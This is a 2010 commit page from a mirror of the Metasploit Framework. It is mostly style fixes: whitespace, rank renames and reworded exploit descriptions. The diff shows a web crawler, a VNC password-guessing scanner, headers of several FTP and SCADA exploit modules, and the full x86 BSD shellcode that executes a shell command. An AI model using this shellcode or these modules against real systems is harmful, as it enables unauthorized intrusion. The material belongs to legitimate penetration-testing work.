infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

style compliance fixes, set test exploits to manual rank, fix s/ranking/rank/ in some exploits 

git-svn-id: file:///home/svn/framework3/trunk@11039 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-11-14 19:03:24 +00:00
parent 6856977331
commit 32c26f18f3
27 changed files with 79 additions and 73 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

54
modules/auxiliary/scanner/http/crawler.rb
View File

@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary
page.links
end
=end
#
# The main callback from the crawler
#
@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
# - The path of any URL found by the crawler (web.uri, :path => page.path)
# - The occurence of any form (web.form :path, :type (get|post|path_info), :params)
#
def crawler_process_page(t, page, cnt)
def crawler_process_page(t, page, cnt)
msg = "[#{"%.5d" % cnt}/#{"%.5d" % max_page_count}] #{page.code || "ERR"} - #{@current_site.vhost} - #{page.url}"
case page.code
when 301,302
@ -68,12 +68,12 @@ class Metasploit3 < Msf::Auxiliary
else
print_error(msg)
end
#
# Process the web page
#
info = {
info = {
:web_site => @current_site,
:path => page.url.path,
:query => page.url.query,
@ -85,7 +85,7 @@ class Metasploit3 < Msf::Auxiliary
if page.headers['content-type']
info[:ctype] = page.headers['content-type']
end
if page.headers['set-cookie']
info[:cookie] = page.headers['set-cookie']
end
@ -97,34 +97,34 @@ class Metasploit3 < Msf::Auxiliary
if page.headers['location']
info[:location] = page.headers['location']
end
if page.headers['last-modified']
info[:mtime] = page.headers['last-modified']
end
# Report the web page to the database
report_web_page(info)
# Only process interesting response codes
return if not [302, 301, 200, 500, 401, 403, 404].include?(page.code)
#
#
# Skip certain types of forms right off the bat
#
# Apache multiview directories
return if page.url.query =~ /^C=[A-Z];O=/ # Apache
# Scrub out the jsessionid appends
page.url.path = page.url.path.sub(/;jsessionid=[a-zA-Z0-9]+/, '')
#
# Continue processing forms
#
#
forms = []
form_template = { :web_site => @current_site }
form = {}.merge(form_template)
# This page has a query parameter we can test with GET parameters
# ex: /test.php?a=b&c=d
if page.url.query and not page.url.query.empty?
@ -144,7 +144,7 @@ class Metasploit3 < Msf::Auxiliary
form[:params] = [['PATH', path_info]]
form[:query] = page.url.query.to_s
end
# This is an application that uses PATH_INFO for parameters:
# ex: /index.php/Main_Page/Article01
if not form[:path] and page.url.path.to_s =~ /(.*\/[a-z09A-Z]{3,256}\.[a-z09A-Z]{2,8})(\/.*)/
@ -155,19 +155,19 @@ class Metasploit3 < Msf::Auxiliary
form[:params] = [['PATH', path_info]]
form[:query] = page.url.query.to_s
end
# Done processing URI-based forms
forms << form
if page.doc
page.doc.css("form").each do |f|
target = page.url
if f['action'] and not f['action'].strip.empty?
action = f['action']
# Prepend relative URLs with the current directory
action = f['action']
# Prepend relative URLs with the current directory
if action[0,1] != "/" and action !~ /\:\/\//
# Extract the base href first
base = target.path.gsub(/(.*\/)[^\/]+$/, "\\1")
@ -175,12 +175,12 @@ class Metasploit3 < Msf::Auxiliary
if bref['href']
base = bref['href']
end
end
end
action = (base + "/").sub(/\/\/$/, '/') + action
end
target = page.to_absolute(URI( action )) rescue next
if not page.in_domain?(target)
# Replace 127.0.0.1 and non-qualified hostnames with our page.host
# ex: http://localhost/url OR http://www01/url
@ -193,7 +193,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
end
form = {}.merge!(form_template)
form[:method] = (f['method'] || 'GET').upcase
form[:query] = target.query.to_s if form[:method] != "GET"
@ -202,13 +202,13 @@ class Metasploit3 < Msf::Auxiliary
f.css('input', 'textarea').each do |inp|
form[:params] << [inp['name'].to_s, inp['value'] || inp.content || '', { :type => inp['type'].to_s }]
end
# XXX: handle SELECT elements
forms << form
end
end
# Report each of the discovered forms
forms.each do |form|
next if not form[:method]

14
modules/auxiliary/scanner/vnc/vnc_login.rb
View File

@ -1,9 +1,9 @@
##
# $Id: $
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -22,11 +22,11 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'VNC Authentication Scanner',
'Version' => '$Revision: $',
'Version' => '$Revision$',
'Description' => %q{
This module will test a VNC server on a range of machines and
report successful logins. Currently it supports RFB protocol
version 3.3, 3.7, and 3.8 using the VNC challenge response
report successful logins. Currently it supports RFB protocol
version 3.3, 3.7, and 3.8 using the VNC challenge response
authentication method.
},
'Author' =>
@ -43,7 +43,7 @@ class Metasploit3 < Msf::Auxiliary
OptString.new('PASSWORD', [ false, 'The password to test' ]),
OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line",
File.join(Msf::Config.data_directory, "wordlists", "vnc_passwords.txt") ]),
], self.class)
], self.class)
end
def run_host(ip)
@ -51,7 +51,7 @@ class Metasploit3 < Msf::Auxiliary
begin
each_user_pass { |user, pass|
do_login(user, pass)
do_login(user, pass)
}
rescue ::Rex::ConnectionError
nil

0
modules/exploits/netware/sunrpc/pkernel_callit.rb Executable file → Normal file
View File

1
modules/exploits/test/aggressive.rb
View File

@ -12,6 +12,7 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::Remote::Tcp

1
modules/exploits/test/cmdweb.rb
View File

@ -12,6 +12,7 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
# =( need more targets and perhaps more OS specific return values OS specific would be preferred
include Msf::Exploit::Remote::HttpClient

1
modules/exploits/test/dialup.rb
View File

@ -12,6 +12,7 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::Remote::Dialup

1
modules/exploits/test/egghunter.rb
View File

@ -12,6 +12,7 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Egghunter

1
modules/exploits/test/exploitme.rb
View File

@ -12,6 +12,7 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::Remote::Tcp

2
modules/exploits/test/java_tester.rb
View File

@ -13,7 +13,7 @@ require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
Rank = ManualRanking
include Msf::Exploit::Java

1
modules/exploits/test/kernel.rb
View File

@ -15,6 +15,7 @@ require 'msf/core'
# This is a test exploit for testing kernel-mode payloads.
#
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::Remote::Udp
include Msf::Exploit::KernelMode

2
modules/exploits/windows/fileformat/bacnet_csv.rb
View File

@ -20,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'BACnet OPC Client Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in SCADA
This module exploits a stack buffer overflow in SCADA
Engine BACnet OPC Client v1.0.24. When the BACnet OPC Client
parses a specially crafted csv file, arbitrary code may be
executed.

2
modules/exploits/windows/ftp/32bitftp_list_reply.rb
View File

@ -10,7 +10,7 @@
##
class Metasploit3 < Msf::Exploit::Remote
Ranking = GoodRanking
Rank = GoodRanking
include Msf::Exploit::Remote::FtpServer

2
modules/exploits/windows/ftp/aasync_list_reply.rb
View File

@ -10,7 +10,7 @@
##
class Metasploit3 < Msf::Exploit::Remote
Ranking = GoodRanking
Rank = GoodRanking
include Msf::Exploit::Remote::FtpServer

2
modules/exploits/windows/ftp/filewrangler_list_reply.rb
View File

@ -10,7 +10,7 @@
##
class Metasploit3 < Msf::Exploit::Remote
Ranking = GoodRanking
Rank = GoodRanking
include Msf::Exploit::Remote::FtpServer
include Msf::Exploit::Remote::Egghunter

2
modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb
View File

@ -10,7 +10,7 @@
##
class Metasploit3 < Msf::Exploit::Remote
Ranking = GoodRanking
Rank = GoodRanking
include Msf::Exploit::Remote::FtpServer
include Msf::Exploit::Remote::Egghunter

2
modules/exploits/windows/ftp/ftppad_list_reply.rb
View File

@ -10,7 +10,7 @@
##
class Metasploit3 < Msf::Exploit::Remote
Ranking = GoodRanking
Rank = GoodRanking
include Exploit::Remote::FtpServer

2
modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb
View File

@ -10,7 +10,7 @@
##
class Metasploit3 < Msf::Exploit::Remote
Ranking = GoodRanking
Rank = GoodRanking
include Exploit::Remote::FtpServer
include Exploit::Remote::Egghunter

2
modules/exploits/windows/ftp/ftpsynch_list_reply.rb
View File

@ -10,7 +10,7 @@
##
class Metasploit3 < Msf::Exploit::Remote
Ranking = GoodRanking
Rank = GoodRanking
include Exploit::Remote::FtpServer

2
modules/exploits/windows/ftp/gekkomgr_list_reply.rb
View File

@ -10,7 +10,7 @@
##
class Metasploit3 < Msf::Exploit::Remote
Ranking = GoodRanking
Rank = GoodRanking
include Msf::Exploit::Remote::FtpServer
include Exploit::Remote::Egghunter

2
modules/exploits/windows/ftp/leapftp_list_reply.rb
View File

@ -10,7 +10,7 @@
##
class Metasploit3 < Msf::Exploit::Remote
Ranking = GoodRanking
Rank = GoodRanking
include Msf::Exploit::Remote::FtpServer
include Msf::Exploit::Remote::Egghunter

2
modules/exploits/windows/ftp/odin_list_reply.rb
View File

@ -10,7 +10,7 @@
##
class Metasploit3 < Msf::Exploit::Remote
Ranking = GoodRanking
Rank = GoodRanking
include Msf::Exploit::Remote::FtpServer
include Msf::Exploit::Remote::Egghunter

2
modules/exploits/windows/ftp/seagull_list_reply.rb
View File

@ -10,7 +10,7 @@
##
class Metasploit3 < Msf::Exploit::Remote
Ranking = GoodRanking
Rank = GoodRanking
include Msf::Exploit::Remote::FtpServer
include Msf::Exploit::Omelet

4
modules/exploits/windows/http/amlibweb_webquerydll_app.rb
View File

@ -20,9 +20,9 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Amlibweb NetOpacs webquery.dll Stack Overflow',
'Name' => 'Amlibweb NetOpacs webquery.dll Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in Amlib's Amlibweb
This module exploits a stack buffer overflow in Amlib's Amlibweb
Library Management System (NetOpacs). The webquery.dll
API is available through IIS requests. By specifying
an overly long string to the 'app' parameter, SeH can be

2
modules/exploits/windows/ldap/pgp_keyserver7.rb
View File

@ -21,7 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'Network Associates PGP KeyServer 7 LDAP Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in the LDAP service that is
This module exploits a stack buffer overflow in the LDAP service that is
part of the NAI PGP Enterprise product suite. This module was tested
against PGP KeyServer v7.0. Due to space restrictions, egghunter is
used to find our payload - therefore you may wish to adjust WfsDelay.

2
modules/exploits/windows/scada/citect_scada_odbc.rb
View File

@ -21,7 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'CitectSCADA/CitectFacilities ODBC Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in CitectSCADA's ODBC daemon.
This module exploits a stack buffer overflow in CitectSCADA's ODBC daemon.
This has only been tested against Citect v5, v6 and v7.
},
'Author' =>

2
modules/exploits/windows/scada/moxa_mdmtool.rb
View File

@ -20,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'MOXA Device Manager Tool 2.1 Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in MOXA MDM Tool 2.1.
This module exploits a stack buffer overflow in MOXA MDM Tool 2.1.
When sending a specially crafted MDMGw (MDM2_Gateway) response, an
attacker may be able to execute arbitrary code.
},

42
modules/payloads/singles/bsd/x86/exec.rb
View File

@ -52,7 +52,7 @@ module Metasploit3
;;
;
; Name: single_exec
; Platforms: *BSD
; Platforms: *BSD
; Authors: vlad902 <vlad902 [at] gmail.com>
; Version: $Revision$
; License:
@ -68,31 +68,31 @@ module Metasploit3
;;
; NULLs are fair game.
push 0x3b
pop eax
cdq
push 0x3b
pop eax
cdq
push edx
push 0x632d
mov edi, esp
push edx
push 0x632d
mov edi, esp
push edx
push 0x68732f6e
push 0x69622f2f
mov ebx, esp
push edx
push 0x68732f6e
push 0x69622f2f
mov ebx, esp
push edx
call getstr
push edx
call getstr
db "CMD", 0x00
getstr:
push edi
push ebx
mov ecx, esp
push edx
push ecx
push ebx
push eax
int 0x80
push edi
push ebx
mov ecx, esp
push edx
push ecx
push ebx
push eax
int 0x80
EOS
asm.gsub!(/CMD/, cmd.gsub('"', "\\\""))
payload = Metasm::Shellcode.assemble(Metasm::Ia32.new, asm).encode_string